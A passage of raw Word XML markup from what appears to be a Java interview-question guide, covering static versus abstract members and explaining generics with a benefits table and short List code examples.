        </w:rPr>
        <w:t>Example Combining Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C83C1C9" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstrac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Databas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35ADF5CA" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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stat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final</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DEFAULT_URL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8800"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"jdbc:defaul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static constant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB21F1" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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3F121968" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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abstrac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connec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abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34657230" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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32DA7940" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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stat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printDefaultUrl</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static method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A4F9D" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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DEFAULT_URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437CF8D3" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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5D8A4C39" w14:textId="16BB208E" w:rsidR="00D277B0" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666E0190" w14:textId="77777777" w:rsidR="00D277B0" w:rsidRPr="00CE4B95" w:rsidRDefault="00D277B0" w:rsidP="00B20DBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6DB86A" w14:textId="34B56921" w:rsidR="00A21AB9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D704B2" w:rsidP="001E716D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F2C35F" wp14:editId="5912C9A2">
            <wp:extent cx="4533211" cy="2173771"/>
            <wp:effectExtent l="57150" t="57150" r="96520" b="93345"/>
            <wp:docPr id="607966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966806" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4569855" cy="2191342"/>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033046F7" w14:textId="6E1F2AF9" w:rsidR="00610A67" w:rsidRPr="00CE4B95" w:rsidRDefault="00610A67" w:rsidP="00610A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528C3AB" w14:textId="77777777" w:rsidR="00893857" w:rsidRPr="00CE4B95" w:rsidRDefault="00610A67" w:rsidP="00610A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Static members are resolved at compile-time (early binding), while abstract methods enable runtime polymorphism (late binding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352D0496" w14:textId="77777777" w:rsidR="00893857" w:rsidRPr="00CE4B95" w:rsidRDefault="00893857" w:rsidP="00610A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C32776" w14:textId="51F7236C" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00DA02D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc196307504"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Generics?</w:t>
      </w:r>
      <w:r w:rsidR="005166DA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is the use of Generics?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="76B79C58" w14:textId="4F2CB7EA" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Generics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java enable you to write </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type-safe and reusable code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. They allow you to define classes, interfaces, and methods with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so you can work with any object type while maintaining compile-time type checking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5DCC4" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D038A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3D12107E">
          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2354B1" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why Use Gener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60"/>
        <w:gridCol w:w="6433"/>
      </w:tblGrid>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="72BF1788" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0975167F" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BECB3EA" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="1A35C67C" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F6C29B" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Type Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40947413" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Catches type errors at compile time. No </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ClassCastException</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> at runtime.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="03E8E151" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0C44C3" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Code Reusability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DB6ABC8" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Write a single class/method for any data type.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="1DAE7F49" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181882BF" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Readability &amp; Maintainability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5C9434" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Avoids unnecessary casting and makes the code easier to read.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005214B6" w:rsidRPr="00CE4B95" w14:paraId="2342AC4A" w14:textId="77777777" w:rsidTr="005214B6">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A55D8AE" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6657C9" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Eliminates need for boxing/unboxing (with collections).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4FD8466F" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D038A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="790F8132">
          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712E8F7" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Without Generics (Old Java Style):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D56FA" w14:textId="77777777"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7669051"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> name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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E8331" w14:textId="77777777"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7669051"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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lice"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34870B5F" w14:textId="15259F2B"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7669051"/>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anual cast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC05414" w14:textId="77777777" w:rsidR="005214B6" w:rsidRPr="00CE4B95" w:rsidRDefault="005214B6" w:rsidP="00D038A9">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example With Generics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9C8EC1" w14:textId="77777777"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4026816"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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name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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D75A6" w14:textId="77777777"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4026816"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
